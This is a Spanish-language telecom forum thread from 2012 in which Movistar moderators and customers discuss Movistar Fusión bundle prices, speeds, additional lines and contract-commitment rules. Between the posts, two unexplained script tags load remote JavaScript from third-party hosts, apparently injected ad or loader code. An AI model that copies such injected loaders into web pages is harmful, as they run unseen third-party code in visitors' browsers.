Editado 21-09-2012 10:07
Editado 21-09-2012 10:07
Buenas tardes a tod@s
Los últimos días nos habéis hecho llegar una serie de preguntas sobre Movistar Fusión que esperamos poder resolver con las siguientes dudas frecuentes, no obstante estaremos encantados de resolver cualquier otra pregunta que pueda no estar contemplada en las mismas.
SERVICIO MOVISTAR FUSIÓN
LINEAS ADICIONALES
Podrás financiar los dispositivos con precio desde 60€ en cuotas mensuales con un plazo máximo de 24 meses.
Para facilitarte las cuentas, el importe de la cuota financiada del móvil se añadirá a la cuota mensual en la factura fijo de Movistar Fusión, para que en la misma se refleje el gasto completo en comunicaciones.
Al cabo de 12 meses quedaras libre de permanencia pudiendo permanecer con Movistar Fusión o darte de baja sin penalización.
Si por el contrario te das de baja de todo el paquete Movistar Fusión no superados los 12 meses de compromiso, la línea adicional será reposicionada al Contrato Básico Personal con un Habla y Navega 30 (o Con tu Negocio 24h + Internet 40 para autónomos) y se ejecutará la penalización de 190€.
FACTURACIÓN
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
¡Resuelto! Ir a solución.
Editado 20-09-2012 21:49
Editado 20-09-2012 21:49
Añadido!!! Agrupación Consultas Frecuentes.
Empiezo a leérmelo!!!
¿Si se baja de 30 a 10 seguiría por VDSL?
Lo de Movistar y el "VDSL hasta 30Mb" es de juzgado de guardia.
No teníamos bastante con lo de los canales HD y ahora al contratar Movistar Fusion te bajan la velocidad a 10Mb.
Lo curioso es que "Movistar Fusión Fibra" tiene 100Mb.
¿Entiende alguien esto?
Saludos
TRXer escribió:
Lo de Movistar y el "VDSL hasta 30Mb" es de juzgado de guardia.
No teníamos bastante con lo de los canales HD y ahora al contratar Movistar Fusion te bajan la velocidad a 10Mb.
Lo curioso es que "Movistar Fusión Fibra" tiene 100Mb.
¿Entiende alguien esto?
Saludos
Buenas noches yo como cliente del VDSL hasta 30 megas exigo que al menos antes de fin de año, tengamos los 3 megas de subida por lo menos.
Saludos de Rafa
¿Te refieres a 20€ por línea adicional en las mismas condiciones que la primera, es decir, 500 minutos en llamadas y 1 GB de datos (si no recuerdo mal)?
Gracias por contestar.
Saludos.
Concuerdo con Rafa25, que la velocidad de subida en VDSL pase a mínimo a 3 Mbps (30/3) que hay margen de sobra, que rebajen el precio en ADSL y VDSL (algo ya más que amortizado) para competir y que retiren la permanencia en la mayoría de servicios residenciales como son ADSL, VDSL, FTTH y servicios móviles. Ah sí, y que en los servicios de FTTH las conexiones sean simétricas.
Con todo esto, Movistar recuperará su status.
@Rafa25: ¡Viva Arroyo del Ojete!
Con todo solo queda una duda, a ver si me la puedes responder Rafa... los que tenemos el Contrato Familiar, eso que pagas 3€ por linea, seguiremos pagandolo igual, o desaparece esa opción??
Salud!
Buenas,
Mi duda es, ¿qué pasa con la gente que en vez de los 50 minutos de llamadas a movil por semana tenemos MIT Tu eliges? ¿Se puede seguir manteniendo?
sii, exactamente es eso, las mismas condiciones que la otra linea por 20 euros mas iva!
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
chiscu escribió:
Con todo solo queda una duda, a ver si me la puedes responder Rafa... los que tenemos el Contrato Familiar, eso que pagas 3€ por linea, seguiremos pagandolo igual, o desaparece esa opción??
Salud!
Buenas noches chiscu habra que esperar a la letra pequeña de las tarifas Fusion para saber eso que me preguntas.
Siento no poder darte una respuesta positiva.
Saludos de Rafa
Yo calculé mas o menos... En todas falta añadir con un móvil más.
Movistar Fusión ADSL 10/800MB
Móvil |
Fijo |
500 Minutos |
ADSL 10/800 (Bajada/Subida) |
1GB a máxima velocidad |
Tarifa Plana Nacional |
SMS Ilimitados |
500Min F-M Sábado y Domingo |
|
50Min F-M Lunes a Viernes |
Precio del paquete con una única línea móvil: 49.90€ (60.38 IVA Incluido).
-Añadir 1 Línea móvil: 49.90€ + 20€= 69.90€ (84.58 IVA Incluido).
-Añadir 2 Líneas móvil: 49.90€ + 40= 89.90€ (108.78 IVA Incluido).
Añadir 3 Líneas móvil: 49.90 + 60€= 109.90€ (132.98 IVA Incluido).
Movistar Fusión ADSL 10/800 + Tv
Móvil |
Fijo |
Tv |
500 Minutos |
Tarifa Plana Nacional |
Imagenio |
1GB a máxima velocidad |
500Min F-M Sáb y Dom |
|
SMS Ilimitados |
|
Precio del paquete con una única línea móvil: 79.90€ (96.68 IVA Incluido)
-Añadir 1 Línea móvil: 79.90€ + 20€= 99.90 (120.88 IVA Incluido).
-Añadir 2 Líneas móvil: 79.90€ + 40= 119.90€ (145.08 IVA Incluido).
-Añadir 3 Líneas móvil: 79.90 + 60€= 139.90€ (169.28 IVA Incluido).
Movistar Fusión Fibra 100Mb
Móvil |
Fijo |
500 Minutos |
FTTH 100/10 (Bajada/Subida) |
1GB a máxima velocidad |
Tarifa Plana Nacional |
SMS Ilimitados |
500Min F-M Sábado y Domingo |
|
Precio del paquete con una única línea móvil: 59.90€ (72.48 IVA Incluido)
-Añadir 1 Línea móvil: 59.90€ + 20€= 79.90 (96.68 IVA Incluido).
-Añadir 2 Líneas móvil: 59.90€ + 40= 99.90€ (120.88 IVA Incluido).
-Añadir 3 Líneas móvil: 59.90 + 60€= 119.90€ (145.08 IVA Incluido).
Movistar Fusión Fibra 100Mb + Tv
Móvil |
Fijo |
Tv |
500 Minutos |
Tarifa Plana Nacional |
Imagenio |
1GB a máxima velocidad |
500Min F-M Sáb y Dom |
|
SMS Ilimitados |
|
Precio del paquete con una única línea móvil: 89.90€ (108.78 IVA Incluido)
-Añadir 1 Línea móvil: 89.90€ + 20€= 109.90 (132.98 IVA Incluido).
-Añadir 2 Líneas móvil: 89.90€ + 40= 129.90 (157.18 IVA Incluido).
-Añadir 3 Líneas móvil: 89.90 + 60€= 149.90 (176.89 IVA Incluido).
Editado 20-09-2012 22:57
Editado 20-09-2012 22:57
chiscu escribió:
Salud!
SI haces referencia a la solución familiar para hablar gratis, lo que tienes que estar atento es no te la quiten directamente al pasar, ya que creo que comercialmente ya no esta ese modulo.
Muchas gracias compañero. Esto si que es un estudio pormenorizado.
Saludos.
Pues me gusta mucho el movistar fusión, e calculado que me voy a ahorrar 20 euros cada mes, que buenos son y encima voy a cuadriplicar los minutos de mi habla 15 actual y doblar mis datos del movil.
Enhorabuena movistar!!
En el tema permanencia, no entiendo el concepto de latente. Yo tengo un consumo mínimo de 45 euros con una permanencia aun de un año. Si dentro de un año abandono fusión que ocurre?
Editado 21-09-2012 2:01
Editado 21-09-2012 2:01
Hola:
Yo tengo unas dudas a ver si me las contestáis:
- Si tienes ya ADSL o Imagenio y móvil, es un cambio administrativo o técnico.
- Tengo trío 6MB debido a que mi linea no puede con 10MB en Imagenio. ¿Puedo tener fusión?
- Qué pasa si tienes un MIT. Tengo el de 100MB en vez de llamadas a moviles entre semana.
- ¿Podrás seguir disfrutando de otros móviles que tengan la dirección de factura la misma de los 5 euros de descuento en datos y que no se acojan a fusión?
- No entiendo lo de permanencia "latente". Si me quedan p.e. 15 meses con GM 6 y estoy en fusión 12 meses y luego no renuevo, ¿cuánto me queda de permanencia: 15 o 3 meses?
Saludos
¿Como va la permanencia? A los 12 meses si quiero seguir en Fusion, ¿se renueva la permanencia o puedo seguir ya sin permanencia?
diegsai escribió:Hola:
Yo tengo unas dudas a ver si me las contestáis:
- Si tienes ya ADSL o Imagenio y móvil, es un cambio administrativo o técnico.
- Tengo trío 6MB debido a que mi linea no puede con 10MB en Imagenio. ¿Puedo tener fusión?
- Qué pasa si tienes un MIT. Tengo el de 100MB en vez de llamadas a moviles entre semana.
- ¿Podrás seguir disfrutando de otros móviles que tengan la dirección de factura la misma de los 5 euros de descuento en datos y que no se acojan a fusión?- No entiendo lo de permanencia "latente". Si me quedan p.e. 15 meses con GM 6 y estoy en fusión 12 meses y luego no renuevo, ¿cuánto me queda de permanencia: 15 o 3 meses?
Saludos
Yo en tu caso, lo que deduzco a ver si algun moderador te ayuda mejor es que tendras que dar de alta/baja cosas hasta que tengas el paquete correcto para fusión.
Es decir el trio 6mb posiblemente tengas que modificarlo para que sea el trio hasta 10mb (que te llegara lo mismo que tienes ahora supongo) y lo de la mit segura que te diran que tienes que darlo de baja y coger los 50 minutos de llamadas a moviles entre semana.
Eso creo, pero no estoy seguro.
un saludo
Yo la duda que tengo es si es el ADSL HASTA 10 MB o el ADSL 10 MB, porque cada vez que preguntas te dicen una cosa diferente :S.
Está claro que si es el ADSL 10 MB, si sale el 1 de Octubre me lo pillo XD
Andrés escribió:
Añadido!!! Agrupación Consultas Frecuentes.
Empiezo a leérmelo!!!
¿Si se baja de 30 a 10 seguiría por VDSL?
Hola Andrés
Seguiría siendo VDSL pero con velocidad de de 10MB en vez de 30MN.
Un saludo
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Hola.
Leyendo y dudando.
Andres pregunta como quedaria el VDSL , que seria VDSL 10/1, o 10/800?.
Y otra mas, si uno tiene ADSL2+, puede pasarse a VDSL 10/? y contratar Fusión con ese VDSL, o no es factible por los valores de la linea que no valen para VDSL hasta 30 megas?.
saludicos,.
Editado 21-09-2012 9:52
Editado 21-09-2012 9:52
En las últimas horas ha aparecido la noticia de que la CMT da el visto bueno a Movistar Fusión pero si y sólo si eliminan la permanencia de 12 meses. ¿Podéis clarificar ésto por favor? Yo lo tengo claro, sin permanencia puede ser una buena opción, con permanencia.... miraré hacia otro lado sin duda.
Por tanto: ¿Habrá o no permanencia para Movistar Fusión?
MlRaigada escribió:
En el tema permanencia, no entiendo el concepto de latente. Yo tengo un consumo mínimo de 45 euros con una permanencia aun de un año. Si dentro de un año abandono fusión que ocurre?
Buenos días y bienvenido a la Comunidad
Contestando a tu duda y para aclarar de paso el concepto de permanencia "latente", indicarte que si el compromiso de consumo mínimo que tuvieras antes de pasar a Fusión fuera menor a 12 meses (por ejemplo 6), al terminar el de Fusión (12 meses) habría quedado "diluido" con el propio de Fusión,
Si por el contrario tienes una permanencia superior a 12 meses (por ejemplo 18) y al terminar la permanencia propia de Movistar Fusión te dieras de baja de Fusión, se te aplicaría la permanencia que te quedara restante después de haber restado los 12 meses que (en este ejemplo serian 6 meses) ya has cumplido.
Esperamos haber resuelto tu duda
Un saludo
javy97 escribió:
¿Como va la permanencia? A los 12 meses si quiero seguir en Fusión, ¿se renueva la permanencia o puedo seguir ya sin permanencia?
Hola Javi
Al terminar los 12 meses se renueva automáticamente Movistar Fusión pero sin permanencia.
Un saludo
Esty23 escribió:
Yo la duda que tengo es si es el ADSL HASTA 10 MB o el ADSL 10 MB, porque cada vez que preguntas te dicen una cosa diferente :S.
Está claro que si es el ADSL 10 MB, si sale el 1 de Octubre me lo pillo XD
Cualquier modalidad de ADSL es compatible con Movistar Fusión, disfrutando el cliente de la máxima velocidad que por cobertura puedas tener en tu dirección.
Otra duda.
Si yo contrato Movistar Fusión para mi (tengo ADSL y móvil a mi nombre) por 49,9€ /mes pero mi mujer sigue con su móvil sin cambiar de titular ¿pierde su descuento de 5€ en la tarifa de datos por estar asociado ese móvil al ADSL de nuestro domicilio?
Espero haberme explicado bien